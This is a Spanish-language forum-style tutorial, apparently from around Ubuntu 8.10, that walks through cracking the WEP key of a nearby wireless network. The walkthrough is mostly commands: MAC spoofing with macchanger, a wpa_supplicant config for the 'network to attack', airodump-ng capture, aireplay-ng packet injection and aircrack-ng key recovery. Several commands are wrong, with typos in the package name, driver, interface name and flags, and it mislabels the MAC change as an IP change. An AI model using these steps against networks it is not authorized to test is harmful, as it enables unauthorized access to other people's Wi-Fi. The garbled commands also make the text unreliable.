Desencriptar wep con Intel 4965 VAIO CR-240F (UBUNTU)

Esto es trabajo de una semana en donde deje botada la univerisidad, mi novia y la tele......

Pasos a seguir
recomendable: descargar ubuntu 8.10 http://www.ubuntu.com/testing/810rc
graban el ubuntu en un cd como copia de imagen el programa Alcohol 120 la graba sin problemas, luego lo ejecutan dentro de windows y les saldra la opcion de instalar desde ahi, motivo de esta opcion, 1.- si no les gusta ubuntu simplemente van a programas, ubuntu, desintalar (todo esto desde windows) 2.- si les gusta lo dejan como esta y empiezan a tomarle el gusto a linux. 3.- ya no ocuparan el cd para bootear, cuando prendan su pc les aparesera la opcion de empezar sesion con windows o ubuntu (facil no...?).
Tenemos instalado el ubuntu 8.10: descargamos desde ubuntu dos aplicaciones: aircrack y macchanger
Instalar aircrack: abrimos la consola de ubuntu (Aplicaciones - Accesorios - Terminal) y colocan lo siguiente:

sudo apt-get install aircrack, les pedira contraseña la colocan y empieza a instalar.

Instalar macchanger:

sudo apt-get install macchange

tambien se instala desde terminal como sa abran dado cuenta. Con esto estamos listo para empezar a con los pasos para descifrar su wep.

Primero vamos a crear un archivo de texto llamado (wpa.conf) coloquenlo en un lugar donde lo encuentren con facilidad. Yo, lo coloque en /home/soldik/wpa.conf ( el soldik es el nombre de mi sesion y carpeta principal), ustedes pueden colocar el suyo. El archivo wpa.conf deben escribir en el lo siguiente:


network={
ssid="ESSID" ....................... ( nombre de la red que van a atacar)
key_mgmt=NONE
bssid=BSSID ....................... ( MAC de la red que van a atacar)
wep_key0="232323343478787"
}


Ahora solo coloquen los datos que les puse el nombre y mac lo colocaran despues, cuando yo les diga.
Empezamos con el ataque propiamente tal.
Abrimos la consola o terminal (Aplicaciones - Accesorios - Terminal) escriben:

sudo -i (enter)
con esto quedan en modo superusuario, escriben despues:

ifconfig wlan0 down (enter)
macchanger -m 00:11:22:33:44:55 wlan0 (enter) con esto cambian su IP
iwconfig wlano (enter) veran caracteristicas
ifconfig wlan0 up (enter)
iwlist wlan0 scan (enter)

aca ya empieza lo entretenido, aparecera la lista de redes que puede detectar la tarjeta de red, localizan su tarjeta, veran el nombre de red y la mac tambien el channel estos tres datos son importantes, no cierren la consola, buscan el archivo que crearon al principio, lo abren y modifican los datos por ejemplo:
network={
ssid=piramide ....................... ( nombre de la red que van a atacar)
key_mgmt=NONE
bssid=00:vv:3w:xx:xx:xx ....................... ( MAC de la red que van a atacar)
wep_key0="232323343478787"
}
luego ponen guardar y cierran el archivo, vamos a la terminal que dejamos abierta y colocamos:

airmon-ng start wlan0 channel x (colocan en ves de la x el canal de su red) (enter)

airodump-ng -w soldik --bssid MAC de su red -c canal de su red mon0 (enter)
primera etapa terminada.

Abren una nueva solapa de su terminal, escriben:

sudo -i (enter)
con esto quedan en modo superusuario

wpa_supplicant -c /home/soldik/wpa.conf -Dwet -iwlan0 (no presionen enter)


Abren una nueva solapa de su terminal para inyectar, escriben

sudo -i (enter)
con esto quedan en modo superusuario

aireplay-ng -3 -b (mac router) -b 00:11:22:33:44:55 mon0 (no presionen enter)

Abren una nueva solapa de su terminal para descifrar, escriben:

sudo -i (enter)
con esto quedan en modo superusuario

aircrack-ng *.cap (no presionen enter)

Tercera etapa:

Vamos a la segunda solapa, apretamos enter, van a apareser dos lineas de escritura que iran descendiendo todo el tiempo no se asusten no es nada malo, pareciera pero no lo es, lo dejan como estan.

Vamos a la tercera solapa apretamos enter y empezaremos a inyectar de una forma descomunal, diriganse a la primera pantalla y veran una nueva linea de comando donde se muestra como se asocia su mac con la mac falsa que crearon y arriba veran # pakets que se inyectan a gran velocidad, esperen hasta que tengan unos 50000 paquetes en los casos mas rapidos, pero si quieren estar mas seguro esperan hasta que haya unos 150000 paquetes, cuando esten muertos de nervio por ver si resulta jejejeje vayan a la ultima solapa y apretan enter y LISTO KEY FOUND 100%

Escriban y me dicen como les fue cualquier duda igual.......................
Saludos para Marcel 1983, quien respondio mis dudas gracias men.......

chauuuuuuu
jp soldik